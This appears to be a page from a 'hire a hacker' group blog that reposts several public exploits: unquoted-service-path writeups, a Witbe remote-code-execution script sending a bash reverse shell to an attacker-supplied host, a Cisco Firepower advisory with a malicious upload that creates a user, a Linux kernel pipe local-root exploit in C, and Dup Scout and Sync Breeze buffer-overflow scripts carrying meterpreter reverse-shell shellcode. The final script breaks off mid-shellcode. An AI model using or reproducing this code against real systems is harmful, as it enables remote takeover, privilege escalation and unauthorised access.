Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863109153

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Abyss Web Server X1 2.11.1 Multiple Local Privilege Escalation
# Date: 05/10/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Author twitter: @tulpa_security
# Vendor Homepage: http://aprelium.com/
# Application Download: http://aprelium.com/abyssws/download.php
# Version: Software Version 2.11.1
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec

1. Description:

Abyss Web Server installs a service called 'AbyssWebServer' with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. Abyss Web Server also suffers from weak file and folder permissions which could allow

an unauthorized user to swop out executable files with their own payload.

2. Proof

C:\Program Files>sc qc AbyssWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AbyssWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Abyss Web Server\abyssws.exe --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Abyss Web Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
HireHackking 
# Exploit Title: Fortitude HTTP 1.0.4.0 Unquoted Service Path Elevation of Privilege
# Date: 05/10/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Author twitter: @tulpa_security
# Vendor Homepage: http://www.networkdls.com/
# Software Link: http://www.networkdls.com/Software/View/Fortitude_HTTP
# Version: Software Version 1.0.4.0
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec

1. Description:

Netgear Genie installs a service called 'Fortitude HTTP' with an unquoted service path

running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.

2. Proof

C:\Program Files>sc qc "Fortitude HTTP"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Fortitude HTTP
        TYPE               : 110 WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NetworkDLS\Fortitude HTTP\Bin
\FortitudeSvc.exe /RunService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NetworkDLS Fortitude HTTP
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
HireHackking 
#!/usr/bin/python
# Exploit Title: Witbe RCE (Remote Code Execution)
# Exploit Author: BeLmar
# Date: 05/10/2016
# DEMO : https://youtu.be/ooUFXfUfIs0
# Contact : hb.mz093@gmail.com
# Vendor Homepage: http://www.witbe.net
# Tested on: Windows7/10 & BackBox
# Category: Remote Exploits

import urllib
import urllib2
import os

print " M    MW    M  M  XXMMrX, 2Mr72S   MW7XS"                             
print " MM   MM   M2  M    SM    MM   MM  M    "                             
print "  M  M ZM  M   M    XM    MMir0M   MMrXS"                              
print "  MM M  M M:   M    SM    MM   ZM  M2   "                             
print "   MMa  MMM    M    ZM    MM   XM  M    "                              
print "   XM    M     M    iM    8MZ8W8   MM8BB" 
print "             EXPLOIT BY BELMAR          "
print ""

print "Run NetCat Listner" # First Run Netcat Listner 

rhost = raw_input('RHOST: ')
lhost = raw_input('LHOST: ')
lport = raw_input('LPORT: ')

url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
values = {'auth_login': '', #Leave it as it is
          'auth_pwd': '',   #Leave it as it is
          'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
HireHackking 
KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command
Execution Leading to Root Access

Title: Cisco Firepower Threat Management Console Remote Command Execution
Leading to Root Access
Advisory ID: KL-001-2016-007
Publication Date: 2016.10.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt


1. Vulnerability Details

     Affected Vendor: Cisco
     Affected Product: Firepower Threat Management Console
     Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
     Platform: Embedded Linux
     CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous
     Type, CWE-94: Improper Control of Generation of Code
     Impact: Arbitrary Code Execution
     Attack vector: HTTP
     CVE-ID: CVE-2016-6433

2. Vulnerability Description

     An authenticated user can run arbitrary system commands as
     the www user which leads to root.

3. Technical Description

     A valid session and CSRF token is required.  The webserver runs as
     a non-root user which is permitted to sudo commands as root with
     no password.

     POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1
     Host: 1.3.3.7
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
Gecko/20100101 Firefox/45.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6
     Connection: close
     Content-Type: multipart/form-data;
boundary=---------------------------15519792567789791301241925798
     Content-Length: 813

     -----------------------------15519792567789791301241925798
     Content-Disposition: form-data; name="manual_update"

     1
     -----------------------------15519792567789791301241925798
     Content-Disposition: form-data; name="source"

     file
     -----------------------------15519792567789791301241925798
     Content-Disposition: form-data; name="file";
filename="Sourcefire_Rule_Update-2016-03-04-001-vrt.sh"
     Content-Type: application/octet-stream

     sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic
     -----------------------------15519792567789791301241925798
     Content-Disposition: form-data; name="action_submit"

     Import
     -----------------------------15519792567789791301241925798
     Content-Disposition: form-data; name="sf_action_id"

     8c6059ae8dbedc089877b16b7be2ae7f
     -----------------------------15519792567789791301241925798--


     HTTP/1.1 200 OK
     Date: Sat, 23 Apr 2016 13:38:01 GMT
     Server: Apache
     Vary: Accept-Encoding
     X-Frame-Options: SAMEORIGIN
     Content-Length: 49998
     Connection: close
     Content-Type: text/html; charset=utf-8

     ...

     $ ssh korelogic@1.3.3.7
     Password:

     Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.
     Cisco is a registered trademark of Cisco Systems, Inc.
     All other trademarks are property of their respective owners.

     Cisco Fire Linux OS v6.0.1 (build 37)
     Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)

     Could not chdir to home directory /Volume/home/korelogic: No such file or
directory
     korelogic@firepower:/$ sudo su -
     Password:
     root@firepower:~#

4. Mitigation and Remediation Recommendation

     The vendor has acknowledged this vulnerability but has
     not issued a fix. Vendor acknowledgement available at:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel) of
KoreLogic, Inc.

6. Disclosure Timeline

     2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
     2016.06.30 - Cisco acknowledges receipt of vulnerability report.
     2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
                  this vulnerability and for 3 others reported in the
                  same product.
     2016.08.12 - 30 business days have elapsed since the vulnerability was
                  reported to Cisco.
     2016.09.02 - 45 business days have elapsed since the vulnerability was
                  reported to Cisco.
     2016.09.09 - KoreLogic asks for an update on the status of the
                  remediation efforts.
     2016.09.15 - Cisco confirms remediation is underway and soon to be
                  completed.
     2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
                  will be released publicly on 2016.10.05.
     2016.10.05 - Public disclosure.

7. Proof of Concept

     See Technical Description


The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
HireHackking 
/* exp_moosecox.c
   Watch a video of the exploit here:
   http://www.youtube.com/watch?v=jt81NvaOj5Y

   developed entirely by Ingo Molnar (exploit writer extraordinaire!) , 
   thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)

   dedicated to the Red Hat employees who get paid to copy+paste my 
   twitter and issue security advisories, their sweet 
   acknowledgement policy, and general classiness
   see: https://bugzilla.redhat.com/show_activity.cgi?id=530490

   "policy" aside, there's a word for what you guys are doing: "plagiarism"
   in fact, i tested this one day by posting three links to twitter,
   without any discussion on any of them.  the same day, those three
   (and only those three) links were assigned CVEs, even though two of 
   them weren't even security bugs (it doesn't pay to copy+paste)

   official Ingo Molnar (that's me) policy for acknowledgement in 
   exploits requires general douche-ness or plagiarization
   official policy further dictates immediate exploit release for
   embargoed, patched bug

   I'll be curious to see what the CVE statistics are like for the 
   kernel this year when they get compiled next year -- I'm predicting 
   that when someone's watching the sleepy watchers, a more personal 
   interest is taken in doing the job that you're paid to do correctly.

   --------------------------------------------------------------------

   Special PS note to Theo (I can do this here because I know he'll 
   never read it -- the guy is apparently oblivious to the entire world of 
   security around him -- the same world that invents the protections 
   years before him that he pats himself on the back for "innovating")
   Seriously though, it's incredible to me that an entire team 
   of developers whose sole purpose is to develop a secure operating 
   system can be so oblivious to the rest of the world.  They haven't 
   innovated since they replaced exploitable string copies with 
   exploitable string truncations 6 or so years ago.

   The entire joke of a thread can be read here:
   http://www.pubbs.net/openbsd/200911/4582/
   "Our focus therefore is always on finding innovative ideas which make 
    bugs very hard to exploit succesfully."
   "He's too busy watching monkey porn instead of
    building researching last-year's security technology that will stop 
    an exploit technique that has been exploited multiple times."
   "it seems that everyone else is slowly coming around to the
    same solution."

   So let's talk about this "innovation" of theirs with their 
   implementation of mmap_min_addr:

   They implemented it in 2008, a year after Linux implemented it, a 
   year after the public phrack article on the bug class, more than a 
   year after my mail to dailydave with the first public Linux kernel 
   exploit for the bug class, and over two years after UDEREF was 
   implemented in PaX (providing complete protection against the smaller 
   subset of null ptr dereference bugs and the larger class of invalid 
   userland access in general).

   OpenBSD had a public null pointer dereference exploit (agp_ioctl()) 
   published for its OS in January of 2007.  It took them over a year 
   and a half to implement the same feature that was implemented in 
   Linux a few months after my public exploit in 2007.

   So how can it be that "everyone else is slowly coming around to the 
   same solution"  when "everyone else" came to that solution over a 
   year before you Theo?  In fact, I prediced this exact situation would 
   happen back in 2007 in my DD post:
   http://lists.virus.org/dailydave-0703/msg00011.html
   "Expect OpenBSD to independently invent a protection against null ptr 
    deref bugs sometime in 2009."

   Let's talk about some more "innovation" -- position independent 
   executables.  PaX implemented position independent executables on 
   Linux back in 2001 (ET_DYN).  PIE binary support was added to GNU 
   binutils in 2003.  Those OpenBSD innovators implemented PIE binaries 
   in 2008, 7 years after PaX.  Innovation indeed!

   How about their W^X/ASLR innovation?  These plagiarists have the 
   audacity to announce on their press page:
   http://www.openbsd.org/press.html
   "Microsoft borrows one of OpenBSD's security features for Vista, 
    stack/library randomization, under the name Address Space Layout 
    Randomization (ASLR).  "Until now, the feature has been most 
    prominently used in the OpenBSD Unix variant and the PaX and Exec 
    Shield security patches for Linux""
   Borrowing one of your features?  Where'd this ASLR acronym come from 
   anyway?  Oh that's right, PaX again -- when they published the first 
   design and implementation of it, and coined the term, in July 2001.
   It covered the heap, mmap, and stack areas.
   OpenBSD implemented "stack-gap randomization" in 2003.  Way to 
   innovate!

   W^X, which is a horrible name as OpenBSD doesn't even enforce it with 
   mprotect restrictions like PaX did from the beginning or even SELinux 
   is doing now (from a 3rd party contribution modeled after PaX): 
   PaX implemented true per-page non-executable page support, protecting 
   binary data, the heap, and the stack, back in 2000.
   OpenBSD implemented it in 2003, requiring a full userland rebuild.
   The innovation is overwhelming!

   They keep coming up with the same exact "innovations" others came up 
   with years before them.  Their official explanation for where they 
   got the W^X/ASLR ideas was a drunk guy came into their tent at one of 
   their hack-a-thons and started talking about the idea.  They had 
   never heard of PaX when we asked them in 2003.  Which makes the 
   following involuntarily contributed private ICB logs from Phrack #66
   (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:

   On some sunny day in July 2002 (t: Theo de Raadt):
   <cloder> why can't you just randomize the base
   <cloder> that's what PaX does
   <t> You've not been paying attention to what art's saying, or you don't 
    understand yet, either case is one of think it through yourself.
   <cloder> whatever

   Only to see poetic justice in August 2003 (ttt: Theo again):

   <miod> more exactly, we heard of pax when they started bitching
   <ttt> miod, that was very well spoken.

   That wraps up our OpenBSD history lesson, in case anyone forgot it.
   PS -- enjoy that null ptr deref exploit just released for OpenBSD.

   --------------------------------------------------------------------

   Important final exploit notes:

   don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,
   or DEBUG_SPINLOCK are enabled and modify the structures below 
   accordingly -- a fancier exploit would do this automatically

   I've broken the 2.4->2.6.10 version of the exploit and would like to see 
   someone fix it ;)  See below for more comments on this.
*/

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sched.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include "exp_framework.h"

int pipefd[2];
struct exploit_state *exp_state;
int is_old_kernel = 0;

int go_go_speed_racer(void *unused)
{
    int ret;

        while(!exp_state->got_ring0) {
        /* bust spinlock */
        *(unsigned int *)NULL = is_old_kernel ? 0 : 1;
                ret = pipe(pipefd);
        if (!ret) {
                    close(pipefd[0]);
                    close(pipefd[1]);
        }
        }

    return 0;
}

/* <3 twiz/sgrakkyu */
int start_thread(int (*f)(void *), void *arg)
{
        char *stack = malloc(0x4000);
        int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
        if (tid < 0) {
                printf("can't create thread\n");
                exit(1);
        }
    sleep(1);
        return tid;
}

char *desc = "MooseCox: Linux <= 2.6.31.5 pipe local root";
char *cve = "CVE-2009-3547";

#define PIPE_BUFFERS 16

/* this changes on older kernels, but it doesn't matter to our method */
struct pipe_buf_operations {
    int can_merge;
    void *map;
    void *unmap;
    void *confirm;
    void *release;
    void *steal;
    void *get;
};

struct pipe_buffer2620ornewer {
    void *page;
    unsigned int offset, len;
    void *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buffer2619orolder {
    void *page;
    unsigned int offset, len;
    void *ops;
    unsigned int flags;
};

struct pipe_buffer2616orolder {
    void *page;
    unsigned int offset, len;
    void *ops;
};

struct pipe_inode_info2620ornewer {
    unsigned int spinlock;
    /*
    // LOCKBREAK
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    void *owner;
    */
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    void *tmp_page;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
    void *inode;
    struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];
};

struct pipe_inode_info2619orolder {
    unsigned int spinlock;
    /*
    // if PREEMPT enabled
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    void *owner;
    */
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];
    void *tmp_page;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
    void *inode;
};

struct pipe_inode_info2616orolder {
    unsigned int spinlock;
    /*
    // if PREEMPT enabled
    unsigned int break_lock;
    // DEBUG_SPINLOCK
    unsigned int magic, owner_cpu;
    */
    void *owner;
    void *next, *prev;
    unsigned int nrbufs, curbuf;
    struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];
    void *tmp_page;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    void *fasync_readers;
    void *fasync_writers;
};

struct fasync_struct {
    int magic;
    int fa_fd;
    struct fasync_struct *fa_next;
    void *file;
};

struct pipe_inode_info2610orolder {
    /* this includes 2.4 kernels */
    unsigned long lock; // can be rw or spin
    void *next, *prev;
    char *base;
    unsigned int len;
    unsigned int start;
    unsigned int readers;
    unsigned int writers;
    /* 2.4 only */
    unsigned int waiting_readers;

    unsigned int waiting_writers;
    unsigned int r_counter;
    unsigned int w_counter;
    /* 2.6 only */
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
};

int prepare(unsigned char *buf)
{    
    struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;
    struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;
    struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;
    struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;
    struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;
    int i;
    int newver;
    struct utsname unm;

    i = uname(&unm);
    if (i != 0) {
        printf("unable to get kernel version\n");
        exit(1);
    }

    if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {
        fprintf(stdout, " [+] Using newer pipe_inode_info layout\n");
        newver = 3;
    } else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {
        fprintf(stdout, " [+] Using older pipe_inode_info layout\n");
        newver = 2;
    } else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {
        fprintf(stdout, " [+] Using older-er pipe_inode_info layout\n");
        newver = 1;
//    } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {
//        is_old_kernel = 1;
//        newver = 0;
    } else {
        fprintf(stdout, " [+] This kernel is still vulnerable, but I can't be bothered to write the exploit.  Write it yourself.\n");
        exit(1);
    }

    /* for most of these what will happen is our write will
       cause ops->confirm(/pin) to be called, which we've replaced
       with own_the_kernel
       for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets
       called instead (repeatedly) is the release op
    */
    if (newver == 3) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_new->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_new->next = &info_new->next;
        info_new->readers = 1;
        info_new->writers = 1;
        info_new->nrbufs = 1;
        info_new->curbuf = 1;
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_new->bufs[i].ops = (void *)ops;
    } else if (newver == 2) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_old->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_old->next = &info_old->next;
        info_old->readers = 1;
        info_old->writers = 1;
        info_old->nrbufs = 1;
        info_old->curbuf = 1;
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_old->bufs[i].ops = (void *)ops;
    } else if (newver == 1) {
        /* uncomment for DEBUG_SPINLOCK */
        //info_older->magic = 0xdead4ead;
        /* makes list_head empty for wake_up_common */
        info_older->next = &info_older->next;
        info_older->readers = 1;
        info_older->writers = 1;
        info_older->nrbufs = 1;
        info_older->curbuf = 1;
        /* we'll get called multiple times from free_pipe_info
           but it's ok because own_the_kernel handles this case
        */
        for (i = 0; i < PIPE_BUFFERS; i++)
            info_older->bufs[i].ops = (void *)ops;
    } else {
        /*
        different ballgame here, instead of being able to 
        provide a function pointer in the ops table, you 
        control a base address used to compute the address for 
        a copy into the kernel via copy_from_user.  The 
        following should get you started.
        */
        /* lookup symbol for writable fptr then trigger it later
           change the main write in the one thread to write out 
           pointers with the value of exp_state->exploit_kernel
        */
        info_oldest->base = (char *)0xc8000000;
        info_oldest->readers = 1;
        info_oldest->writers = 1;
        return 0;
    }

    ops->can_merge = 1;
    for (i = 0; i < 16; i++)
        ((void **)&ops->map)[i] = exp_state->own_the_kernel;

    return 0;
}

int requires_null_page = 1;

int get_exploit_state_ptr(struct exploit_state *ptr)
{
    exp_state = ptr;
    return 0;
}

int trigger(void)
{
        char buf[128];
        int fd;
    int i = 0;

    /* ignore sigpipe so we don't bail out early */
    signal(SIGPIPE, SIG_IGN);

    start_thread(go_go_speed_racer, NULL);

    fprintf(stdout, " [+] We'll let this go for a while if needed...\n");
    fflush(stdout);

        while (!exp_state->got_ring0 && i < 10000000) {
        fd = pipefd[1];
        sprintf(buf, "/proc/self/fd/%d", fd);
        fd = open(buf, O_WRONLY | O_NONBLOCK);
        if (fd >= 0) {
            /* bust spinlock */
            *(unsigned int *)NULL = is_old_kernel ? 0 : 1;
            write(fd, ".", 1);
            close(fd);
        }
        i++;
        }

    if (!exp_state->got_ring0) {
        fprintf(stdout, " [+] Failed to trigger the vulnerability.  Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\n");
        return 0;
    }

    return 1;
}

int post(void)
{
//    return RUN_ROOTSHELL;
    return FUNNY_PIC_AND_ROOTSHELL;
}
HireHackking 
#!/usr/bin/python

print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 1004FAF3

nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
#!/usr/bin/python

print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
